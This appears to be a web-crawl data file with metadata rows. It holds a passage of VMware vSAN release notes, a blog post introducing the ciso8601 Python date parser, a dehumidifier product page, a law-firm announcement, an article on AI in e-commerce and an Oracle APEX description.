The time interval for a planned host restart has been reduced by persisting in-memory metadata to disk before the restart or shutdown. This method reduces the time required for hosts in a vSAN cluster to restart, which decreases the overall cluster downtime during maintenance windows. - Workload I/O analysis. Analyze VM I/O metrics with IOInsight, a monitoring and troubleshooting tool that is integrated directly into vCenter Server. Gain a detailed view of VM I/O characteristics such as performance, I/O size and type, read/write ratio, and other important data metrics. You can run IOInsight operations against VMs, hosts, or the entire cluster. - Consolidated I/O performance view. You can select multiple VMs, and display a combined view of storage performance metrics such as IOPS, throughput, and latency. You can compare storage performance characteristics across multiple VMs. - VM latency monitoring with IOPS limits. This improvement in performance monitoring helps you distinguish the periods of latency that can occur due to enforced IOPS limits. This view can help organizations that set IOPS limits in VM storage policies. - Secure drive erase. Securely wipe flash storage devices before decommissioning from a vSAN cluster through a set of new PowerCLI or API commands. Use these commands to safely erase data in accordance to NIST standards. - Data migration pre-check for disks. vSAN’s data migration pre-check for host maintenance mode now includes support for individual disk devices or entire disk groups. This offers more granular pre-checks for disk or disk group decommissioning. - VPAT section 508 compliant. vSAN is compliant with the Voluntary Product Accessibility Template (VPAT). VPAT section 508 compliance ensures that vSAN had a thorough audit of accessibility requirements, and has instituted product changes for proper compliance. Scale without Compromise - HCI Mesh. HCI Mesh now enables vSAN clusters to share capacity with vSphere compute-only clusters, or non-HCI based clusters. You can also specify storage rules for recommended data placement, to find a compatible datastore. Scalability for a single remote vSAN datastore has been increased to 128 hosts. - vSAN File Service enhancements. vSAN File Service now supports stretched cluster deployments and two-node clusters. Scalability is increased to 64 hosts and 100 shares per cluster. - Stretched cluster enhancements. A stretched cluster now can include up to 20 hosts at each site. DRS awareness of stretched clusters provides more consistent performance during failback situations. - vSAN over RDMA. vSAN over RDMA delivers increased performance and enables you to obtain better VM consolidation ratios. - Enhanced platform performance. Improves platform NUMA awareness to deliver increased performance. Boost Infrastructure and Data Security - vSphere Native Key Provider. vSAN supports vSphere Native Key Provider for built-in encryption. - Data-in-transit encryption for vSAN File Service. Security enhancements to File Service include support for data-in-transit encryption, when File Service is enabled along with vSAN data-in-transit encryption. - Data-in-transit encryption for shared witness. vSAN 7.0 Update 2 supports data-in-transit encryption for shared witness hosts. - vLCM enhancements. vLCM now supports firmware updates for select Hitachi UCP HC servers, along with existing support for select Dell EMC, HPE and Lenovo servers. vLCM can update vSphere with Tanzu clusters configured with NSX-T networking. 
In addition, scalability is increased to 400 hosts managed by vLCM within a single vCenter Server. - vSAN management and monitoring enhancements. Additional tools are available to analyze your environment, and rapidly identify root causes of issues and ways to remediate. Enhancements include proactive capacity management, networking diagnostics, insights into performance top contributors, and health check history. - Unplanned failure handling. vSAN 7.0 Update 2 includes enhanced data durability to tolerate unplanned host, disk, or network failures by creating additional durability components at the time of failure. - File Service snapshots. vSAN 7.0 Update 2 simplifies backup of file shares with snapshot support and APIs that allow backup and recovery software vendors to integrate with vSAN File Service. - vSphere Proactive HA support. vSAN now supports proactive HA, which detects hardware issues and can take proactive steps to place hosts into maintenance mode. - VMFS6 file system support. A newly created VM on vSAN datastore will have VMFS6 file system on the VM namespace object if the object format version is 14. You can use SEsparse snapshots with the VM. - Efficient VMDK moves. When you move a VMDK between two directories on same vSAN datastore using the vSphere Datastore Browser UI or API (VirtualDiskManager.moveVirtualDisk), only the VMDK descriptor file and object metadata is updated. This operation is faster because the VMDK backing vSAN object data is not copied. Developer Ready Infrastructure - CNS platform improvements. CNS platform has improved performance, scale, and resiliency, including better concurrency for Async CSI queries, better handling of orphan volumes, and improved troubleshooting tools. - Vanilla Kubernetes support enhancements. Enhancements include vSAN stretched cluster support and topology support. - vSphere with Tanzu. vSAN 7.0 Update 3 supports ReadWriteMany PVs for Tanzu Kubernetes Grid. - vDPp improvements. vSAN Data Persistence Platform now supports asynchronous installation and upgrades of partner services. New versions of MinIO and Cloudian are available in this release. Pre-checks when entering maintenance mode and disk decommissioning support are available. - vSAN cluster shutdown and restart. You now can easily shutdown and restart a vSAN cluster. The Shutdown Cluster wizard performs prechecks, and enables you to review, confirm and track the steps needed before and during shutdown and restart process. - vLCM enhancements. vLCM’s hardware compatibility checks support validation of disk device firmware against the vSAN HCL before applying the desired cluster image. vLCM supports upgrade of vSAN witness host (dedicated) as part of the coordinated cluster remediation workflow for vSAN two-node clusters and stretched clusters. - Enhanced network monitoring and anomaly detection. vSAN 7.0 Update 3 provides additional network health checks for diagnostics, and enables you to tune network monitoring thresholds. - vSAN health check correlation. The new vSAN health correlation engine helps identify the root cause of issues on the cluster. This information can simplify troubleshooting and help you remediate related warnings on the cluster. - VM I/O trip analyzer. Visual representation of the vSAN I/O path and related performance information throughout the I/O path enables you to easily diagnose VM performance issues. - Improved performance monitoring of PV/FCDs. 
Performance displays can provide an end-to-end view of Persistent Volumes and First Class Disk performance. - Stretched cluster site/witness failure resiliency. This release enables stretched clusters to tolerate planned or unplanned downtime of a site and the witness. You can perform site-wide maintenance (such as power or networking) without concerns about witness availability. - Nested fault domains for two-node deployments. This feature provides the ability to make an additional copy of the data within the host in addition to making copies across the hosts in a two-node cluster. This delivers data availability even after a planned/unplanned downtime of a host and losing a drive or disk group on the surviving host. The policy can be configured through SPBM. - Stuck I/O enhancements. vSAN gracefully detects stuck I/O (failure of I/O controller to complete an operation) on a host and redirects it to a replica. The vSphere Client alerts you of the condition, so you can migrate workloads non-disruptively and power-cycle the problematic host. - Encryption key persistence. Encryption keys generated by the Key Management solution can be stored in the TPM chip. - Access Based Enumeration. vSAN File Services now supports SMB Access Based Enumeration (ABE). ABE restricts directory enumeration based on access privileges configured on the directory. Performance without Tradeoffs - vSAN Express Storage Architecture. vSAN ESA is an alternative architecture that provides the potential for huge boosts in performance with more predictable I/O latencies and optimized space efficiency. - Increased write buffer. vSAN Original Storage Architecture can support more intensive workloads. You can configure vSAN hosts to increase the write buffer from 600 GB to 1.6 TB. - Native snapshots with minimal performance impact. vSAN ESA file system has snapshots built in. These native snapshots cause minimal impact to VM performance, even if the snapshot chain gets deep. The snapshots are fully compatible with existing backup applications using VMware VADP. Supreme Resource and Space Efficiency - Erasure Coding without compromising performance. The vSAN ESA RAID5/RAID6 capabilities with Erasure Coding provide a highly efficient Erasure Coding code path, so you can have both a high-performance and a space-efficient storage policy. - Improved compression. vSAN ESA has advanced compression capabilities that can bring up to 4x better compression. Compression is performed before data is sent across the vSAN network, providing better bandwidth usage. - Expanded usable storage potential. vSAN ESA consists of a single-tier architecture with all devices contributing to capacity. This flat storage pool removes the need for disk groups with caching devices. - Reduced performance overhead for high VM consolidation. Resource and space efficiency improvements enable you to store more VM data per cluster, potentially increasing VM consolidation ratios. - HCI Mesh support for 10 client clusters. A storage server cluster can be shared with up to 10 client clusters. Fast, Efficient Data Protection with vSAN ESA Native Snapshots - Negligible performance impact. Long snapshot chains and deep snapshot chains cause minimal performance impact. - Faster snapshot operations. Applications that suffered from snapshot create or snapshot delete stun times will perform better with vSAN ESA. - Consistent partner backup application experience using VMware VADP. VMware snapshot APIs are unchanged.
VMware VADP supports all vSAN ESA native snapshot operations on the vSphere platform. Availability and Serviceability - Simplified and accelerated servicing per device. vSAN ESA removes the complexity of disk groups, which streamlines the replacement process for failed drives. - Smaller failure domains and reduced data resynchronization. vSAN ESA has no single points of failure in its storage pool design. vSAN data and metadata are protected according to the Failures To Tolerate (FTT) SPBM setting. Neither caching nor compression lead to more than a single disk failure domain if a disk crashes. Resync operations complete faster with vSAN ESA. - Enhanced data availability and improved SLAs. Reduction in disk failure domains and quicker repair times means you can improve the SLAs provided to your customers or business units. - vSAN boot-time optimizations. vSAN boot logic has been further optimized for faster startup. - Enhanced shutdown and startup workflows. The vSAN cluster shutdown and cluster startup process has been enhanced to support vSAN clusters that house vCenter or infrastructure services such as AD, DNS, DHCP, and so on. - Reduced vSAN File Service failover time. vSAN File Service planned failovers have been streamlined. Intuitive, Agile Operations - Consistent interfaces across all vSAN platforms. vSAN ESA uses the same screens and workflows as vSAN OSA, so the learning curve is small. - Per-VM policies increase flexibility. vSAN ESA is moving cluster-wide settings to the SPBM level. In this release, SPBM compression settings give you granular control down to the VM or even VMDK level, and you can apply them broadly with datastore default policies. - Proactive Insight into compatibility and compliance. This mechanism helps vSAN clusters connected to VMware Analytics Cloud identify software and hardware anomalies. If an OEM partner publishes an advisory about issues for a drive or I/O controller listed in vSAN HCL, you can be notified about the potentially impacted environment. Additional Features and Enhancements - Enhanced network uplink latency metrics. vSAN defines more meaningful and relevant metrics catered to the environment, whether the latencies are temporary or from an excessive workload. - RDT level checksums. You can set checksums at the RDT layer. These new checksums can aid in debugging and triaging. - vSAN File Service debugging. File Service Day 0 operations have been improved for efficient validation and troubleshooting. - vSAN File Service over IPv6. You can create a file service domain with IPv6 network. - vSAN File Service network reconfiguration. You can change file server IPs including the primary IP to new IPs in the same or different subnet. - vSphere Client Remote Plug-ins. All VMware-owned local plug-ins are transitioning to the new remote plug-in architecture. vSAN local plug-ins have been moved to vSphere Client remote plug-ins. The local vSAN plug-ins are deprecated in this release. - vLCM HCL disk device. Enhancements improve vLCM’s functionality and efficiency for checking compatibility with the desired image. It includes a check for “partNumber” and “vendor” to add coverage for more vendors. - Reduced start time of vSAN health service. The time needed to stop vSAN health service as a part of vCenter restart or upgrade has been reduced to 5 seconds. - vSAN health check provides perspective to VCF LCM. This release provides only relevant vSAN health checks to VCF in order to improve LCM resiliency in VCF. - vSAN improves cluster NDU for VMC. 
New capabilities improve design and operation of a highly secure, reliable, and operationally efficient service. - vSAN encryption key verification. Detects invalid or corrupt keys sent from the KMS server, identifies discrepancies between in-memory and on-disk DEKs, and alerts customers in case of discrepancies. - Better handling of large component deletes. Reclaims the logical space and accounts for the physical space faster, without causing NO_SPACE error. - Renamed vSAN health “Check” to “Finding.” This change makes the term consistent with all VMware products. - Place vSAN in separate sandbox domain. Daemon sandboxing prevents lateral movement and provides defense in depth. Starting with vSAN 8.0, a least-privilege security model is implemented, wherein any daemon that does not have its custom sandbox domain defined will run as a deprivileged domain. This achieves a least-privilege model on an ESXi host, with all vSAN daemons running in their own sandbox domain with the least possible privilege. - vSAN Proactive Insights. This mechanism enables vSAN clusters connected to VMware Analytics Cloud to identify software and hardware anomalies proactively. - Management and monitoring of PMEM for SAP HANA. You can manage PMEM devices within the hosts. vSAN provides management capabilities such as health checks, performance monitoring, and space reporting for the PMEM devices. PMEM management capabilities do not require vSAN services to be enabled. vSAN does not use PMEM devices for caching vSAN metadata or for vSAN data services such as encryption, checksum, or dedupe and compression. The PMEM datastore is local to each host, but can be managed from the monitor tab at the cluster level. - Replace MD5, SHA1, and SHA2 in vSAN. SHA1 is no longer considered secure, so VMware is replacing SHA1, MD5, and SHA2 with SHA256 across all VMware products, including vSAN. - IL6 compliance. vSAN 8.0 is IL6 compliant. - Disaggregation with vSAN Express Storage Architecture. vSAN 8.0 Update 1 provides disaggregation support for vSAN Express Storage Architecture (ESA), as it is supported with vSAN Original Storage Architecture (OSA). You can mount remote vSAN datastores that reside in other vSAN ESA server clusters. You also can use an ESA cluster as the external storage resource for a compute-only cluster. All capabilities and limits that apply to disaggregation support for vSAN OSA also apply to vSAN ESA. vSAN ESA client clusters can connect only to a vSAN ESA based server cluster. - Disaggregation for vSAN stretched clusters (vSAN OSA). This release supports vSAN stretched clusters in disaggregated topology. In addition to supporting several stretched cluster configurations, vSAN can optimize network paths for certain topologies to improve stretched cluster performance. - Disaggregation across clusters using multiple vCenter Servers (vSAN OSA). vSAN 8.0 Update 1 introduces support for vSAN OSA disaggregation across environments using multiple vCenter Servers. This enables clusters managed by one vCenter Server to use storage resources that reside on a vSAN cluster managed by a different vCenter Server. Optimized Performance, Durability, and Flexibility - Improved performance with new Adaptive Write Path. vSAN ESA introduces a new adaptive write path that dynamically optimizes guest workloads that issue large streaming writes, resulting in higher throughput and lower latency with no additional complexity. - Optimized I/O processing for single VMDK/objects (vSAN ESA).
vSAN ESA has optimized the I/O processing that occurs for each object that resides on a vSAN datastore, increasing the performance of VMs with a significant amount of virtual hardware storage resources. - Enhanced durability in maintenance mode scenarios. When a vSAN ESA cluster enters maintenance mode (EMM) with Ensure Accessibility (applies to RAID 5/6 Erasure Coding), vSAN can write all incremental updates to another host in addition to the hosts holding the data. This helps ensure the durability of the changed data if additional hosts fail while the original host is still in maintenance mode. - Increased administrative storage capacity on vSAN datastores using customizable namespace objects. You can customize the size of namespace objects that enable administrators to store ISO files, VMware content library, or other infrastructure support files on a vSAN datastore. - Witness appliance certification. In vSAN 8.0 Update 1, the software acceptance level for vSAN witness appliance has changed to Partner Supported. All vSphere Installation Bundles (VIBs) must be certified. - Auto-policy management for the default storage policy (vSAN ESA). vSAN ESA introduces auto-policy management, an optional feature that creates and assigns a default storage policy designed for the cluster. Based on the size and type of cluster, auto-policy management selects the ideal level of failure to tolerate and data placement scheme. Skyline health uses this data to monitor and alert you if the default storage policy is ideal or sub-optimal, and guides you to adjust the default policy based on the cluster characteristics. Skyline health actively monitors the cluster as its size changes, and provides new recommendations as needed. - Skyline health intelligent cluster health scoring, diagnostics and remediation. Improve efficiency by using the cluster health status and troubleshooting dashboard that prioritizes identified issues, enabling you to focus and take action on the most important issues. - High resolution performance monitoring in vSAN performance service. vSAN performance service provides real-time monitoring of performance metrics that collects and renders metrics every 30 seconds, making monitoring and troubleshooting more meaningful. - VM I/O trip analyzer task scheduling. VM I/O trip analyzer can schedule based on time-of-day, for a particular duration and frequency to capture details for repeat-offender VMs. The diagnostics data collected are available for analysis in the VM I/O trip analyzer interface in vCenter. - PowerCLI enhancements. PowerCLI supports the following new capabilities: vSAN ESA disaggregation, vSAN OSA disaggregation for stretched clusters, vSAN OSA disaggregation across multiple vCenter Servers, vSAN cluster shutdown, and object format updates and custom namespace objects. Cloud Native Storage - Cloud Native Support for TKGs and supervisor clusters (vSAN ESA). Containers powered by vSphere and vSAN can consume persistent storage for developers and administrators, and use the improved performance and efficiency for their cloud native workloads. - Data Persistence platform support using common vSphere switching. vSAN Data Persistence platform allows third-party ISVs to build solutions, such as S3-compatible object stores, that run natively on vSAN. vDPp is now compatible with VMware vSphere Distributed Switches, reducing the cost and complexity of these solutions.
- Thick provisioning for persistent volumes using SPBM on VMFS datastores (VMware vSAN Direct Configuration). Persistent volumes can be programmatically provisioned as thick when defined in the storage class that is mapped to a storage policy. Enhanced topologies for disaggregation with vSAN Express Storage Architecture bring feature parity for vSAN OSA and vSAN ESA. - vSAN ESA support for stretched clusters in disaggregated topology. vSAN ESA supports disaggregation when using vSAN stretched clusters. In addition to supporting several stretched cluster configurations, vSAN also optimizes the network paths for certain topologies to improve the performance capabilities of stretched cluster configurations. - Support of disaggregation across clusters using multiple vCenter Servers. vSAN 8.0 Update 2 supports disaggregation across environments using multiple vCenter Servers when using vSAN ESA. This enables vSphere or vSAN clusters managed by one vCenter Server to use the storage resources of a vSAN cluster managed by a different vCenter Server. - vSAN ESA Adaptive Write path for disaggregated storage. Disaggregated deployments get the performance benefits of a new adaptive write path previously introduced in vSAN 8.0 Update 1 for standard ESA based deployments. VMs running on a vSphere or vSAN cluster that consume storage from another vSAN ESA cluster can take advantage of this capability. Adaptive write path technology in a disaggregated environment helps your VMs achieve higher throughput and lower latency, and do so automatically in real time, without any interaction by the administrator. Core Platform Enhancements - Integrated File Services for Cloud Native and traditional workloads. vSAN 8.0 Update 2 supports vSAN File Service on vSAN Express Storage Architecture. File service clients can benefit from performance and efficiency enhancements provided by vSAN ESA. - Adaptive Write Path optimizations in vSAN ESA. vSAN ESA introduces an adaptive write path that helps the cluster ingest and process data more quickly. This optimization improves performance for workloads driving high I/O to single object (VMDK), and also improves aggregate cluster performance. - Increased number of VMs per host in vSAN ESA clusters (up to 500/host). vSAN 8.0 Update 2 supports up to 500 VMs per host on vSAN ESA clusters, provided the underlying hardware infrastructure can support it. Now you can leverage NVMe-based high performance hardware platforms optimized for the latest generation of CPUs with high core densities, and consolidate more VMs per host. - New ReadyNode profile and support for read-intensive devices for vSAN ESA. vSAN ESA announces the availability of new ReadyNode profiles designed for small data centers and edge environments with lower overall hardware requirements on a per-node basis. This release also introduces support for read-intensive storage devices. - vSAN ESA support for encryption deep rekey. vSAN clusters using data-at-rest encryption have the ability to perform a deep rekey operation. A deep rekey decrypts the data that has been encrypted and stored on a vSAN cluster using the old encryption key, and re-encrypts the data using newly issued encryption keys prior to storing it on the vSAN cluster. - vSAN ESA prescriptive disk claim. vSAN ESA includes a prescriptive disk claim process that further simplifies management of storage devices in each host in a vSAN cluster. This feature provides consistency to the disk claiming process during initial deployment and cluster expansion.
- Capacity reporting enhancements. Overhead breakdown in vSAN ESA space reporting displays both the ESA object overhead and the original file system overhead. - Auto-Policy management improvements in vSAN ESA. Enhanced auto-policy management feature determines if the default storage policy needs to be adjusted when a user adds or removes a host from a cluster. If vSAN identifies a need to change the default storage policy, it triggers a health check warning. You can make the change with a simple click at which time vSAN reconfigures the cluster with the new policy. - Skyline Health remediation enhancements. vSAN Skyline Health helps you reduce resolution times by providing deployment-specific guidance along with more prescriptive guidance on how to resolve issues. - Key expiration for clusters with data-at-rest encryption. vSAN 8.0 Update 2 supports the use of KMS servers with a key expiration attribute used for assigning an expiration date to a Key Encryption Key (KEK). - I/O top contributors enhancements. vSAN Performance Service has improved the process to find performance hot spots over a customizable time period to help you diagnose performance issues while using multiple types of sources for analysis (VMs, host disks, and so on). - I/O Trip Analyzer supported on two node clusters and stretched clusters. vSAN 8.0 Update 2 has enhanced the I/O Trip Analyzer to report on workloads in a vSAN stretched cluster. Now you can determine where the primary source of latency is occurring in a vSAN stretched cluster, as well as latencies in other parts of the stack that can contribute to the overall latency experienced by the VM. - Easier configuration for two node clusters and stretched clusters. Several new features to help management of two node and stretched cluster deployments. Witness host traffic configured in the vSphere Client. Support for medium sized witness host appliance in vSAN ESA. Support in vLCM to manage lifecycle of shared witness host appliance types. Cloud Native Storage - CSI snapshot support for TKG service. Cloud Native Storage introduces CSI snapshot support for TKG Service, enabling K8s users and backup vendors to take persistent volume snapshots on TKGS. - Data mobility of Cloud Native persistent volumes across datastores. This release introduces built-in migration of persistent volumes across datastores in the vSphere Client.
systems_science
https://engineering.close.com/posts/ciso8601
2020-01-28T16:14:56
s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251779833.86/warc/CC-MAIN-20200128153713-20200128183713-00540.warc.gz
0.902049
596
CC-MAIN-2020-05
webtext-fineweb__CC-MAIN-2020-05__0__22304517
en
Introducing ciso8601: A fast ISO8601 date time parser for Python
Project link: https://github.com/closeio/ciso8601
Sometimes it’s the little things that make web apps faster. We noticed that loading leads and opportunity view pages in Close wasn’t as fast as we wanted it to be in some cases, so we pulled up the profiler. To our surprise, a large portion of time was spent parsing date times, sometimes up to a second.
How did this happen? We serialize certain lead fields in elasticsearch so they get returned with our search results. After fetching the fields, we create corresponding instances in our ORM (see how we made our ORM faster). Part of this process is converting the ISO8601 date time string into a Python datetime object, which was done using dateutil’s parse method:
%timeit dateutil.parser.parse(u'2014-01-09T21:48:00.921000')
10000 loops, best of 3: 111 us per loop
On a fast computer it takes over 0.1ms to parse a date time string. For large object structures with thousands of date time objects this can easily add up. For example, each of our leads has two time stamps (date created and updated), and so do our contacts (each lead can have multiple contacts). When serializing many leads this can easily add up to a second.
There are a few ways to solve this problem:
- Refactor our code base so date times are always unserialized lazily (whenever needed)
- Use a faster date time parser
We decided to look for an existing faster date time parser first. After looking for faster parsers, we found aniso8601, which was faster but not as fast as we wanted it to be. Other parsers we found were slower, and even Python’s datetime module wasn’t as fast as date parsing should be. We figured that date time parsing should be fast and that writing a faster date time parser would benefit other projects as well, so we did it! We wrote a C module that parses an ISO8601 date time string and returns a Python datetime object. The above date time is now parsed much faster:
%timeit ciso8601.parse_datetime(u'2014-01-09T21:48:00.921000')
1000000 loops, best of 3: 320 ns per loop
Note this is in nanoseconds, so that’s just 0.00032 ms. Now, even if we parse tens of thousands of date time objects, it won’t take longer than a few ms. Our profiler confirmed this.
Check out the project on GitHub: https://github.com/closeio/ciso8601
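For readers who want to reproduce the comparison, here is a small, self-contained benchmark sketch along the lines of the timings quoted above; it assumes python-dateutil and ciso8601 are installed, and the absolute numbers will differ from machine to machine.

```python
# Benchmark sketch: dateutil vs. ciso8601 on the same ISO 8601 string.
# Assumes `pip install python-dateutil ciso8601`; timings vary by machine.
import timeit

import ciso8601
import dateutil.parser

TIMESTAMP = u'2014-01-09T21:48:00.921000'

def bench(label, func, number=100_000):
    # timeit returns total seconds for `number` calls; report per-call microseconds.
    total = timeit.timeit(func, number=number)
    print(f"{label}: {total / number * 1e6:.2f} us per call")

bench("dateutil.parser.parse", lambda: dateutil.parser.parse(TIMESTAMP))
bench("ciso8601.parse_datetime", lambda: ciso8601.parse_datetime(TIMESTAMP))

# Both return a datetime.datetime, so ciso8601 is a drop-in replacement
# for this narrow use case:
assert ciso8601.parse_datetime(TIMESTAMP) == dateutil.parser.parse(TIMESTAMP)
```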
systems_science
https://www.corroventa.com.au/products/adsorption-dehumidifiers/
2024-04-20T22:27:33
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817688.24/warc/CC-MAIN-20240420214757-20240421004757-00508.warc.gz
0.919171
218
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__18618741
en
In unheated environments or when water has penetrated deep into a structure, drying using an adsorption dehumidifier is the ideal solution. Corroventa’s adsorption dehumidifiers are available in both analogue and digital models, but all models share certain features; they are powerful and robust, compact and user-friendly, and they have a long service life. Quite simply, they are built for professionals. The picture to the right shows the functioning principle for an adsorption dehumidifier. The process air is sucked in through the inlet with the help of a process air fan (1); the air passes through the rotor (4), whereupon the dehumidified air exits through a dry air outlet (2). The moisture absorbed in the rotor is driven out by heating a small part of the process air in a heater (5), whereupon this air passes through a smaller section of the rotor, regenerating it. The damp air is then removed via the outlet to the environment (3).
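To make the drying process above a little more tangible, here is a rough mass-balance sketch that estimates how much water such a unit removes per hour from the process airflow and the humidity drop across the rotor; the flow rate and humidity-ratio figures are invented example values, not Corroventa specifications.

```python
# Rough mass-balance sketch for an adsorption dehumidifier (illustrative only;
# the numbers below are made-up example values, not manufacturer data).

AIR_DENSITY = 1.2  # kg of dry air per m^3, approximate value at room conditions

def water_removal_rate(airflow_m3_per_h, humidity_in, humidity_out):
    """Water removed per hour (kg/h), given the process airflow and the
    humidity ratio (kg water per kg dry air) before and after the rotor."""
    dry_air_mass_flow = airflow_m3_per_h * AIR_DENSITY       # kg dry air / h
    return dry_air_mass_flow * (humidity_in - humidity_out)  # kg water / h

# Example: 300 m^3/h of process air dried from 8 g/kg to 3 g/kg of moisture
print(water_removal_rate(300, 0.008, 0.003))  # ~1.8 kg of water per hour
```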
systems_science
https://www.slepatents.com/mr-kevin-miller-an-associate/
2024-04-13T21:49:19
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816853.44/warc/CC-MAIN-20240413211215-20240414001215-00315.warc.gz
0.958312
216
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__152253144
en
Mr. Kevin Miller: An Associate Saliwanchik, Lloyd & Eisenschenk (SLE) is pleased to announce that Mr. Kevin Miller is now an Associate at the firm. Mr. Miller, who joined SLE as a Technical Specialist in 2013, is now a member of the Florida Bar and a Registered Patent Attorney with the United States Patent and Trademark Office. Mr. Miller earned his B.A. in Philosophy and Computer Science from Hampden-Sydney College. After working as a software engineer, Mr. Miller attended the Levin College of Law at the University of Florida, where he earned his J.D. He also has an M.B.A. in Technology Management from the University of Phoenix. His primary areas of focus are U.S. and International Patent Preparation and Prosecution, primarily in software and systems engineering, large database systems, machine learning, software and hardware interfaces, and information interfaces and presentation. He is a Microsoft Certified Solutions Developer and a member of the Association for Computing Machinery.
systems_science
https://digiwebocean.com/how-ai-is-transforming-the-e-commerce-industry-in-2024/
2024-04-22T02:54:42
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296818072.58/warc/CC-MAIN-20240422020223-20240422050223-00333.warc.gz
0.901332
956
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__171826782
en
The world of e-commerce is undergoing a significant transformation, driven by the ever-evolving field of Artificial Intelligence (AI). AI is no longer science fiction; it’s rapidly becoming a cornerstone of successful online businesses, shaping how we shop and interact with brands online. Moreover, artificial intelligence (AI) has revolutionized countless industries, and the e-commerce industry is no exception. With its ability to analyze vast amounts of data, automate processes, and personalize customer experiences, AI is reshaping the way businesses operate in the digital marketplace. Let’s explore the profound impact of AI on the e-commerce industry, and how it is driving innovation, efficiency, and growth in online retail. One of the most impactful applications of AI in e-commerce is personalization. AI algorithms analyze vast amounts of customer data, including browsing behavior, purchase history, and even demographics, to understand individual preferences. This allows businesses to: - Recommend products: AI can suggest items likely to interest customers based on their past interactions, leading to increased sales and customer satisfaction. - Personalize search results: Tailored search results ensure customers find what they’re looking for faster, improving the overall shopping experience. - Offer targeted promotions: AI can identify customers most likely to respond to specific promotions, maximizing marketing campaign effectiveness. This level of personalization not only improves customer satisfaction but also increases conversion rates and average order value. Efficient Customer Service: The impact of AI in e-commerce extends far beyond creating a personalized experience. Here are some other key areas where AI is making waves: - Chatbots and virtual assistants: AI-powered chatbots provide 24/7 customer support, answer frequently asked questions, and even handle simple transactions, freeing up human agents for more complex tasks. - Dynamic pricing: AI can analyze market trends, competitor pricing, and customer behavior to adjust prices in real time, ensuring competitiveness and optimal profitability. - Fraud prevention: AI algorithms can identify suspicious behavior and flag potentially fraudulent transactions, protecting businesses from financial losses. - Inventory management: AI can predict demand fluctuations and optimize inventory levels, minimizing the risk of overstocking or understocking, and ensuring efficient logistics. Fraud Detection and Security: AI-powered fraud detection systems analyze transaction data in real time to identify suspicious behavior and prevent fraudulent activities. By employing machine learning algorithms, e-commerce businesses can detect patterns indicative of fraud, such as unusual purchasing patterns or suspicious IP addresses, and take immediate action to mitigate risks. Additionally, AI enhances cybersecurity by identifying vulnerabilities, detecting malware, and safeguarding sensitive customer information, thereby ensuring a secure shopping environment for online shoppers. Predictive Analytics and Forecasting: AI algorithms analyze vast amounts of data to identify patterns, e-commerce trends, and insights that help e-commerce businesses make informed decisions. Predictive analytics forecast future demand, anticipate customer behavior and identify growth opportunities. 
By leveraging AI-driven insights, businesses can optimize marketing campaigns, launch targeted promotions, and allocate resources more effectively, driving revenue and profitability. Challenges and Considerations: While AI holds immense potential for e-commerce businesses, it’s crucial to acknowledge the challenges that come with its implementation. These include: - Data security and privacy: Utilizing customer data responsibly and ethically is paramount. Businesses must adhere to data privacy regulations and ensure transparency in data collection and usage. - Cost of implementation: Developing and maintaining robust AI systems can be expensive, especially for smaller businesses. - Explainability and bias: AI algorithms can be complex, making it challenging to understand their decision-making processes. It’s crucial to address potential biases and ensure fair and ethical treatment of all customers. The Future of E-commerce: As AI technology continues to evolve and become more accessible, its impact on e-commerce will undoubtedly intensify. Businesses that embrace AI and utilize its capabilities effectively will be well-positioned to thrive in the ever-competitive online landscape. However, it’s crucial to approach AI implementation thoughtfully, prioritizing ethical considerations, data security, and responsible use of this powerful technology. The integration of artificial intelligence into the e-commerce industry has revolutionized the way businesses operate and interact with customers in the digital marketplace. From personalized shopping experiences and dynamic pricing to efficient customer service and predictive analytics, AI-driven innovations are driving growth, efficiency, and competitiveness in online retail. As AI continues to evolve and advance, e-commerce businesses must embrace these transformative technologies to stay ahead of the curve and meet the ever-changing demands of today’s consumers.
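To make the product-recommendation idea discussed above concrete, here is a deliberately minimal sketch of item-to-item collaborative filtering using cosine similarity over purchase histories; the customer data and product names are made up, and a production recommender would use far richer signals (browsing behavior, demographics, real-time context).

```python
# Minimal sketch of item-to-item recommendations via cosine similarity over
# purchase histories (illustrative only; real systems use far richer signals).
from math import sqrt

# Hypothetical purchase data: customer -> set of purchased product IDs.
purchases = {
    "alice": {"laptop", "mouse", "keyboard"},
    "bob": {"laptop", "mouse", "headset"},
    "carol": {"phone", "case", "headset"},
}

def cosine(a, b):
    """Cosine similarity between two sets treated as binary vectors."""
    if not a or not b:
        return 0.0
    return len(a & b) / (sqrt(len(a)) * sqrt(len(b)))

def recommend(customer, top_n=3):
    """Score products bought by similar customers that `customer` lacks."""
    own = purchases[customer]
    scores = {}
    for other, items in purchases.items():
        if other == customer:
            continue
        sim = cosine(own, items)
        for item in items - own:
            scores[item] = scores.get(item, 0.0) + sim
    return sorted(scores, key=scores.get, reverse=True)[:top_n]

print(recommend("alice"))  # e.g. ['headset', ...]
```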
systems_science
http://primary-path.com/
2019-03-26T00:02:55
s3://commoncrawl/crawl-data/CC-MAIN-2019-13/segments/1552912204736.6/warc/CC-MAIN-20190325234449-20190326020449-00107.warc.gz
0.914275
153
CC-MAIN-2019-13
webtext-fineweb__CC-MAIN-2019-13__0__99373889
en
Oracle Application Express (APEX) is an Oracle product that is fully supported, enterprise ready and comes at no additional cost. If you have the Oracle Database, you already have Application Express! Since 2004, Application Express has been a fully supported and no-cost feature of the Oracle Database. Using Application Express as a platform, thousands of customers have created applications that range from small opportunistic solutions to enterprise-wide mission-critical systems. Perhaps not surprisingly, Oracle themselves use the development platform to host their online store. - Fully supported by Oracle - No cost feature of the Oracle Database - Included with Oracle Database since 2004 - Runs wherever the Oracle Database runs - Can exploit all features of Oracle Database - Scales with the Oracle Database
systems_science
http://www.emulex.com/fr/partners/strategic-alliances/cisco.html
2013-05-25T13:09:14
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368705953421/warc/CC-MAIN-20130516120553-00031-ip-10-60-113-184.ec2.internal.warc.gz
0.884942
258
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__173364642
en
